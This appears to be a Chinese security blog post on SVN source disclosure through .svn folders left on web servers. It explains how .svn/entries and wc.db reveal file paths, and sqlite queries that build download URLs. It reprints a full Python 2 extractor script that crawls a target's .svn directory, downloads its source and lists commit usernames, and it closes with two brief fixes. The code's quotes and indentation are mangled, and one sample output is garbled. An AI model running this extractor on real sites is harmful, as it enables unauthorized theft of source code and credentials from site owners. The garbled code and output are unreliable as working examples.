SVN漏洞

SVN(subversion)是源代码版本管理软件,造成SVN源代码漏洞的主要原因是管理员操作不规范。“在使用SVN管理本地代码过程中,会自动生成一个名为.svn的隐藏文件夹,其中包含重要的源代码信息。但一些网站管理员在发布代码时,不愿意使用‘导出’功能,而是直接复制代码文件夹到WEB服务器上,这就使.svn隐藏文件夹被暴露于外网环境,黑客可以借助其中包含的用于版本信息追踪的‘entries’文件,逐步摸清站点结构。”(可以利用.svn/entries文件,获取到服务器源码、svn服务器账号密码等信息)

svn<=1.6

从svn的结构图可以看到一个目录text-base,这里有我们源文件的备份,比如要下载somedomain/phpinfo.php,直接访问目录somedomain/.svn/text-base/phpinfo.php.text-base,一般的服务器既不会阻止该目录也不会解释该后缀,我们就可以直接读到本地来。现在只是访问最顶层的文件信息,那怎么遍历呢?这里面就有.svn/entries,这个文件包含着该基础目录下所有的文件和目录,直接递推查找就行。

svn>1.6

svn在1.6之后引入了wc.db来管理文件,该文件位于.svn/wc.db。普通文件位置:somedomain/.svn/pristine/“XX”/“CHECKSUM”.svn-base,CHECKSUM是文件的sha1值,xx则是他的前两位。那这个CHECKSUM去哪找呢?就是我们刚才提到的wc.db,这是一个sqlite数据库。数据库的大体结构如下:
$ sqlite3 wc.db .tables
ACTUAL_NODE NODES PRISTINE WC_LOCK
EXTERNALS NODES_BASE REPOSITORY WORK_QUEUE
LOCK NODES_CURRENT WCROOT
$ sqlite3 wc.db ‘select local_relpath, checksum from NODES’
index.php|$sha1 4 e 6 a 225331 f 9 a e 872 d b 25 a 8 f 85 a e 7 b e 05 c e a 6 d 51 s c r i p t s / m e n u . j s ∣ 4e6a225331f9ae872db25a8f85ae7be05cea6d51 scripts/menu.js| 4e6a225331f9ae872db25a8f85ae7be05cea6d51scripts/menu.jssha1 f a b e b 3 b a 6 a 96 c f 0 c b c a d 1308 a b d b e 0 c 2427 e e e b f s t y l e / s t y l e . j s ∣ fabeb3ba6a96cf0cbcad1308abdbe0c2427eeebf style/style.js| fabeb3ba6a96cf0cbcad1308abdbe0c2427eeebfstyle/style.jssha1$2cc5590e0ba024c3db77a13896da09b39ea74799
$ sqlite3 wc.db ‘select local_relpath, “.svn/pristine/” || substr(checksum,7,2) || “/” || substr(checksum,7) || “.svn-base” as alpha from NODES;’
index.php|.svn/pristine/4e/4e6a225331f9ae872db25a8f85ae7be05cea6d51.svn-base
scripts/menu.js|.svn/pristine/fa/fabeb3ba6a96cf0cbcad1308abdbe0c2427eeebf.svn-base
style/style.js|.svn/pristine/2s/2cc5590e0ba024c3db77a13896da09b39ea74799.svn-base

第一步下载wc.db,然后从NODES表中找到文件名和其sha1值,最后构造下载链接

利用:

推荐:svnexploit
国外大牛写的利用脚本:https://github.com/anantshri/svn-extractor/blob/master/svn_extractor.py
附上源码:

#!/bin/python

import requests
import sys
import argparse
import os
import sqlite3
import traceback
import re

disable insecurerequestwarning

from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def getext(filename):
name, ext = os.path.splitext(filename)
return ext[1:]

def readsvn(data,urli,match,proxy_dict):
old_line=""
file_list=""
dir_list=""
user = “”
pattern = re.compile(match, re.IGNORECASE)
global author_list
global excludes
if not urli.endswith(’/’):
urli = urli + “/”
for a in data.text.splitlines():
#below functionality will find all usernames from svn entries file
if (a == “has-props”):
author_list.append(old_line)
if (a == “file”):
if not pattern.search(old_line):
continue
ignore = getext(old_line) in excludes
if ignore: print urli + old_line, ‘(not extracted)’
else: print urli + old_line
if no_extract and not ignore:
save_url_svn(urli,old_line,proxy_dict)
file_list=file_list + “;” + old_line
if (a == “dir”):
if old_line != “”:
folder_path = os.path.join(“output”, urli.replace(“http://”,"").replace(“https://”,"").replace("/",os.path.sep), old_line)
if not os.path.exists(folder_path):
if no_extract:
os.makedirs(folder_path)
dir_list = dir_list + “;” + old_line
print urli + old_line
try:
d=requests.get(urli+old_line + “/.svn/entries”, verify=False,proxies=(proxy_dict))
readsvn(d,urli+old_line,match,proxy_dict)
except:
print “Error Reading %s%s/.svn/entries so killing” % (urli, old_line)

    old_line = a
return file_list,dir_list,user

def readwc(data,urli,match,proxy_dict):
folder = os.path.join(“output”, urli.replace(“http://”,"").replace(“https://”,"").replace("/",os.path.sep))
pattern = re.compile(match, re.IGNORECASE)
global author_list
global excludes
if not folder.endswith(os.path.sep):
folder = folder + os.path.sep
with open(folder + “wc.db”,“wb”) as f:
f.write(data.content)
conn = sqlite3.connect(folder + “wc.db”)
c = conn.cursor()
try:
c.execute(‘select local_relpath, “.svn/pristine/” || substr(checksum,7,2) || “/” || substr(checksum,7) || “.svn-base” as alpha from NODES where kind=“file”;’)
list_items = c.fetchall()
#below functionality will find all usernames who have commited atleast once.
c.execute(‘select distinct changed_author from nodes;’)
author_list = [r[0] for r in c.fetchall()]
c.close()
for filename,url_path in list_items:
if not pattern.search(filename):
continue
ignore = getext(filename) in excludes
if ignore: print urli + filename, ‘(not extracted)’
else: print urli + filename
if no_extract and not ignore:
save_url_wc(urli,filename,url_path,proxy_dict)
except Exception,e:
print “Error reading wc.db, either database corrupt or invalid file”
if show_debug:
traceback.print_exc()
return 1
return 0

def show_list(list,statement):
print statement
cnt=1
for x in set(list):
print str(cnt) + " : " + str(x)
cnt = cnt + 1

def save_url_wc(url,filename,svn_path,proxy_dict):
global author_list
if filename != “”:
if svn_path is None:
folder_path = os.path.join(“output”, url.replace(“http://”,"").replace(“https://”,"").replace("/",os.path.sep, filename.replace("/",os.path.sep)))
if not os.path.exists(folder_path):
os.makedirs(folder_path)
else:
folder = os.path.join(“output”, url.replace(“http://”,"").replace(“https://”,"").replace("/",os.path.sep), os.path.dirname(filename).replace("/",os.path.sep))
if not os.path.exists(folder):
os.makedirs(folder)
if not folder.endswith(os.path.sep):
folder = folder + os.path.sep
try:
r=requests.get(url + svn_path, verify=False,proxies=(proxy_dict))
with open(folder+os.path.basename(filename),“wb”) as f:
f.write(r.content)
except Exception,e:
print "Error while accessing : " + url + svn_path
if show_debug:
traceback.print_exc()

return 0

def save_url_svn(url,filename,proxy_dict):
global author_list
folder=os.path.join(“output”, url.replace(“http://”,"").replace(“https://”,"").replace("/",os.path.sep))
if not folder.endswith(os.path.sep):
folder = folder + os.path.sep
try:
r=requests.get(url + “/.svn/text-base/” + filename + “.svn-base”, verify=False,proxies=(proxy_dict))
if not os.path.isdir(folder+filename):
with open(folder + filename,“wb”) as f:
f.write(r.content)
except Exception,e:
print “Problem saving the URL”
if show_debug:
traceback.print_exc()
return 0

def main(argv):
target=’’
#placing global variables outside all scopes
global show_debug
global no_extract
global excludes
global author_list
author_list=[]
desc=""“This program is used to extract the hidden SVN files from a webhost considering
either .svn entries file (<1.6)
or wc.db (> 1.7) are available online.
This program actually automates the directory navigation and text extraction process”""
epilog=""“Credit © Anant Shrivastava http://anantshri.info. Contributions from orf, sullo, paddlesteamer.
Greets to Amol Naik, Akash Mahajan, Prasanna K, Lava Kumar for valuable inputs”""
parser = argparse.ArgumentParser(description=desc,epilog=epilog)
parser.add_argument("–url",help=“Provide URL”,dest=‘target’,required=True)
parser.add_argument("–debug",help=“Provide debug information”,action=“store_true”)
parser.add_argument("–noextract",help=“Don’t extract files just show content”,action=“store_false”)
#using no extract in a compliment format if its defined then it will be false hence
parser.add_argument("–userlist",help=“show the usernames used for commit”,action=“store_true”)
parser.add_argument("–wcdb", help=“check only wcdb”,action=“store_true”)
parser.add_argument("–entries", help=“check only .svn/entries file”,action=“store_true”)
parser.add_argument("–proxy",help=“Provide HTTP Proxy in http(s)😕/host:port format”, dest=‘proxy’,required=False)
parser.add_argument("–match", help=“only download files that match regex”)
parser.add_argument("–exclude", help=“exclude files with extensions separated by ‘,’”,dest=‘excludes’,default=’’)
x=parser.parse_args()
url=x.target
no_extract=x.noextract
show_debug=x.debug
match=x.match
excludes = x.excludes.split(’,’)
prox=x.proxy
proxy_dict=""
if prox != None:
print prox
print “Proxy Defined”
proxy_dict = {“http”:prox,“https”:prox}
else:
print “Proxy not defined”
proxy_dict = “”
if (match):
print “Only downloading matches to %s” % match
match="("+match+"|entries ∣ w c . d b |wc.db wc.db)" # need to allow entries$ and wc.db too
else:
match=""
if (x.wcdb and x.entries):
print “Checking both wc.db and .svn/entries (default behaviour no need to specify switch)”
x.wcdb = False
x.entries=False
if url is None:
exit()
print url
if not url.endswith(’/’):
url = url + “/”
print “Checking if URL is correct”
try:
r=requests.get(url, verify=False,proxies=(proxy_dict))
except Exception,e:
print “Problem connecting to URL”
if show_debug:
traceback.print_exc()
exit()
if [200,403,500].count(r.status_code) > 0:
print “URL is active”
if no_extract:
folder_path=os.path.join(“output”, url.replace(“http://”,"").replace(“https://”,"").replace("/",os.path.sep))
if not os.path.exists(folder_path):
os.makedirs(folder_path)
if not x.entries:
print “Checking for presence of wc.db”
r=requests.get(url + “/.svn/wc.db”, verify=False,allow_redirects=False,proxies=(proxy_dict))
if r.status_code == 200:
print “WC.db found”
rwc=readwc(r,url,match,proxy_dict)
if rwc == 0:
if x.userlist:
show_list(author_list,“List of Usersnames used to commit in svn are listed below”)
exit()
else:
if show_debug:
print "Status code returned : " + str(r.status_code)
print “Full Respose”
print r.text
print “WC.db Lookup FAILED”
if not x.wcdb:
print “lets see if we can find .svn/entries”
#disabling redirection to make sure no redirection based 200ok is captured.
r=requests.get(url + “/.svn/entries”, verify=False,allow_redirects=False,proxies=(proxy_dict))
if r.status_code == 200:
print “SVN Entries Found if no file listed check wc.db too”
data=readsvn(r,url,match,proxy_dict)
if ‘author_list’ in globals() and x.userlist:
show_list(author_list,“List of Usernames used to commit in svn are listed below”)
#print author_list
exit();
else:
if show_debug:
print “Status code returned : " + str(r.status_code)
print “Full Respose”
print r.text
print “.svn/entries Lookup FAILED”
print (url + " doesn’t contains any SVN repository in it”)
else:
print "URL returns " + str(r.status_code)
exit()

if name == “main”:
main(sys.argv[1:])

事后修复:

1)删除整个web文件夹,重新在svn代码服务器正确导出代码后,重新部署
2)直接在服务器内删除.svn文件。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值